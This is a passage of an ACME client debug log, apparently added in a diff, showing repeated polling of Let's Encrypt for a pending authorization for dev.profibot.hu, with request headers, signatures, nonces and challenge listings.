"9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:33,720:DEBUG:acme.client:Storing nonce: 58tS3qjER74oEjtPMXdgAp98tbtujmJF15b9TRTuAr_LNBVrMiQ +2025-12-24 22:15:33,721:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:36,722:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:36,726:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRVI3NG9FanRQTVhkZ0FwOTh0YnR1am1KRjE1YjlUUlR1QXJfTE5CVnJNaVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "I_WUHOYNgpvjJ2jATeMZaaYA4H0KO9Kmjb2_UD05RM9XExZRvrrz-MWwlTKoFFQWDSngl1UC2vcHiB8ZLtyIvN8jdmkgOURvLP_CZjZyY9eAtojeMBjm4cKPgnHSuZLlEeJdy5Qi80shxyW-WKHIvN04t0uPDtxbDqk0B0pD4uejkgHS4oddYpopFUnh3QJPSjJLAoFDUqLS7Dmwpv-FylnQTmvcR_Vmv2c8Qx-8GJAd-RMbWiky6WjmBMu0DySctwBcSPDLWI3W5CgZG701qccxI563fodYCd2MzqwC8Y4acNzVfB-XUZLtZOBd4dlcv7ROArouW7p_OLnzTDqXfA", + "payload": "" +} +2025-12-24 22:15:36,883:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:36,884:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:36 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE5GF5LvPl1VfRvQVF06tHRsLlPHT2VDwb-O0Thte-U4g +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:36,884:DEBUG:acme.client:Storing nonce: 58tS3qjE5GF5LvPl1VfRvQVF06tHRsLlPHT2VDwb-O0Thte-U4g +2025-12-24 22:15:36,884:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:39,885:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:39,889:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTVHRjVMdlBsMVZmUnZRVkYwNnRIUnNMbFBIVDJWRHdiLU8wVGh0ZS1VNGciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "iuGQ536NQ7IF00b6SPXIlDkJdGTmXrFzaL6leywX4TMAYkQzo53oJhFCtLxYoKzwUP_Q9y91u2nJw9d--IJbu_AkpHdjWRwbll785_y5KTcdLyfKPRnNai3ufBB1McgCoT1I9YAwSKhBK7MNjA5t_dBAMYEGfR6ZGxKZWH9pzsybHUTnr600LRFet2cdIeey-bFugCgYul-CZPsQQFLcI3CobifkxzO2sGIKe_twnS6nGh5WKgqfYrUd9gAdTI2BmcnLJarRnbl4P4vh1R570nDyY7Y7yRQGfWUfNCJntm5g8wpVCPJN3BK6WOwMD1sQBXlM53wQgJJhg2uGAGVUvw", + "payload": "" +} +2025-12-24 22:15:40,045:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:40,046:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:39 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJUC6jrDPawL_hfKc2iEtLusbG5rTyY0oMa0xpNLu30pQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:40,047:DEBUG:acme.client:Storing nonce: fULB7aUJUC6jrDPawL_hfKc2iEtLusbG5rTyY0oMa0xpNLu30pQ +2025-12-24 22:15:40,047:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:43,048:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:43,051:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlVDNmpyRFBhd0xfaGZLYzJpRXRMdXNiRzVyVHlZMG9NYTB4cE5MdTMwcFEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "GTlOxrjOupzJ5CR93d-IEvNVbQkzrcrgsbD5ubRl-gZsHNawLJMRVKpX9W8d3xwYxYv6titHEaKmrX9hbNHeyFZT3N9I-PdKlBKO_M-A24dSeIWcXGBPsBJViD28vkgtoR6m1xNQtRFIm1Sf788HykXPeijrmGUR82kSLNq_HDhvIC4agndhZjpZatahZj3vICBF70TAAFdDxGDJtgBygotgzmKybSZmQwXUuXPyJcm9ibdYRBm4JZcuQXqtBPUarv6RMQpE4GtF6qiqS510oSi0mBJEa4VvO6cQi0X-Lep56LHftIZoq2IMlslvYYdlAhuPaDtWdI72-ymrNtRivQ", + "payload": "" +} +2025-12-24 22:15:43,207:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:43,208:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:43 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEaRjbHjb6r44SLYVAsBBNtd2RzZa-inR97D7NnESVhqE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:43,208:DEBUG:acme.client:Storing nonce: 58tS3qjEaRjbHjb6r44SLYVAsBBNtd2RzZa-inR97D7NnESVhqE +2025-12-24 22:15:43,209:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:46,210:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:46,214:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWFSamJIamI2cjQ0U0xZVkFzQkJOdGQyUnpaYS1pblI5N0Q3Tm5FU1ZocUUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "Ef1S6X-99wZSXAFmLPjIVDROGdumUKQ4ze05Oeci-RkKfEJi3ARhxtEeZFzmffiZ_1Syhvngk3aA2rlGdT9PIjDBES-QPbKRbcddeSztY-U5t2ZRpdjuq6RsaSPz4-esAHttvLzthb2PkH60jH0h1ELxJXfkPYgRNldiZSkZyEeS7pEu4c0tfiBrteRbL_Mh67Is4eQWvpHv5RI4Yhh8tXvSNu1z5Vjtadw2mf-y_lnDsZWFsi-yOy1B-U76O9a_0vPlB-jGvEVLn5kvaErniNBwLwzphmiR1pS8jNKm8yVxch9gXd06jkZEXWDa8xrDp9lD6A8meYs7psbh8CFqSQ", + "payload": "" +} +2025-12-24 22:15:46,370:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:46,371:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:46 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJn3G3yuOfaYky9mz3z1m2ijdkPR-pxH58PMQhQ-0W2Us +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:46,371:DEBUG:acme.client:Storing nonce: fULB7aUJn3G3yuOfaYky9mz3z1m2ijdkPR-pxH58PMQhQ-0W2Us +2025-12-24 22:15:46,372:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:49,373:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:49,377:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSm4zRzN5dU9mYVlreTltejN6MW0yaWpka1BSLXB4SDU4UE1RaFEtMFcyVXMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "GGij3RjADipfbNE6EXFPzEG0C07s6_V_Mbns-mL-7Br1q3euFPmiopGZ4T3mIDGCnmuA5s_l3_8MxdUloYrID4BZnaEDPTtuOXpq7AsYQL_nrm1EzMKRnlDYoACZcOO5nBW2v7w31qMQOAz3GGjRRn1lmJtiPUCuGZuItc6-e7HpH7HjSyLr4tW5sbf_t_u-6OIEU4mjuVnjmhM3iV3UDcJtie11IABm_WY4xn4QyUldlkICUcZCJGAYaf0YDfgo2JbenvVEGaZQNeltZImICsQCJiuVGEUdMknposZ7yyVqyz0f6J5qnvpXIA7Ayl6wpNJPVD8qbtjNT9VZ8Lkmqw", + "payload": "" +} +2025-12-24 22:15:49,532:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:49,533:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:49 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEagOcnoYaKavnXl-PB7mezFqKc-aCw6tSDde6PBII8to +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:49,533:DEBUG:acme.client:Storing nonce: 58tS3qjEagOcnoYaKavnXl-PB7mezFqKc-aCw6tSDde6PBII8to +2025-12-24 22:15:49,534:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:52,535:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:52,538:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWFnT2Nub1lhS2F2blhsLVBCN21lekZxS2MtYUN3NnRTRGRlNlBCSUk4dG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "NN3lOvbpDt28SNQAdIYWY820FGmAVuFbCGiiyXRmUPRrVDI6Zsj_VSE8Hc2xt35xs4x-ruUtJ-ibMzXh5VFr6YAaapJnIBaPd75vpsc9RL6tAoGPbQiCUkD3PUED-8MmOvUEkU67ikFSbmDEfrTDsBSlK4T31rnI0tND_R-0xtsfy5F6ka_E4gar8S4WUf2wQ6AlIjlcu2ubp0eol4ulgySOxTlVsK7cPX84z1Gb9Qt0nQLdr32p2L5HhgxMBjcceFRLNrLnprfl5kJW1uRSmGr9ZGYLod9CrbCMVNqZx_itM223Y05JObgmBLewT8JhlGc4MJ4LOCsVGXI5m9l0WQ", + "payload": "" +} +2025-12-24 22:15:52,692:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:52,693:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:52 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJrr1oKy9LTJs-nLnWNqpsf-fiiJew__kbJjEVLOxPKj8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:52,694:DEBUG:acme.client:Storing nonce: fULB7aUJrr1oKy9LTJs-nLnWNqpsf-fiiJew__kbJjEVLOxPKj8 +2025-12-24 22:15:52,694:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:55,695:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:55,699:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnJyMW9LeTlMVEpzLW5MbldOcXBzZi1maWlKZXdfX2tiSmpFVkxPeFBLajgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "UI5oeduvW_aH3OEnWt9R8WqRyvph5HRKFSl7A24NvmaUmXTHJRHskuwTCQ760uiVbp7pn6VZZsV9AUjARky9VRRyWgYS4i7C0ZAZnuHvjgJrEasAT-ltC5nA_YsxrJgQNBwKSuaTaBD9CtC28YPNloCiKUvO5YQL4ouFWau_7dakvQ0j-sih9CWyoX-daV-58KnWdAyN5nszxJcdelSGCojTte-jVxStedfk3ne9Y5ofyrwKwwj-Ze1yITVdBVi28qoOipj9LLs9hkRpGqVvrqt6zXY_XR4yuobGy4k8raNWgRBFjGizPT4x8CKc_VKvSkTTn6UobGXzet1QDhTXkA", + "payload": "" +} +2025-12-24 22:15:55,917:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:55,918:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:55 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJpQ_PUkDS1R-e75opAcT8lnfXtSdEzGg6yaYymPdqgzM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:55,918:DEBUG:acme.client:Storing nonce: fULB7aUJpQ_PUkDS1R-e75opAcT8lnfXtSdEzGg6yaYymPdqgzM +2025-12-24 22:15:55,919:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:58,920:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:58,924:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnBRX1BVa0RTMVItZTc1b3BBY1Q4bG5mWHRTZEV6R2c2eWFZeW1QZHFnek0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "KabCH7mDjNa1q5iu_9WDfVqN48Q2TjNYv7MG9HzD3wB1JXsDJUP6UbZHG5fAESJwxWs8qw2si7NKdYrgsUHB9g_ig3mrYbiF4PdoukFQBN-xTJgyWY3uBN8cHgoLQuy7-mYRvnPYHpLQvElsAzEXJ_zoaqVXu4QjYkxOqBnXi_X28_Ruk7CHJXLcxovUNYoLlTbnva3V6ct8sl4PKKic8e-At20NnlgxDdBf3eV-vC9nBGQoYDtTMpoV-hRXsrrgasJaLZWnSGTL3kGw5qdeM1aqCMP2CXx9pH4ViSaopi5MzBeoGjUaEEmbM_XjO0KYwlnrSQECRiz8LPVmErnIzA", + "payload": "" +} +2025-12-24 22:15:59,081:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:59,082:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:58 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEaVRPUeiJ2bF6o7ujKdQPgAnsCQIfIrOrIOtwrqxfAik +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:59,082:DEBUG:acme.client:Storing nonce: 58tS3qjEaVRPUeiJ2bF6o7ujKdQPgAnsCQIfIrOrIOtwrqxfAik +2025-12-24 22:15:59,083:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:16:02,084:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:16:02,087:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": 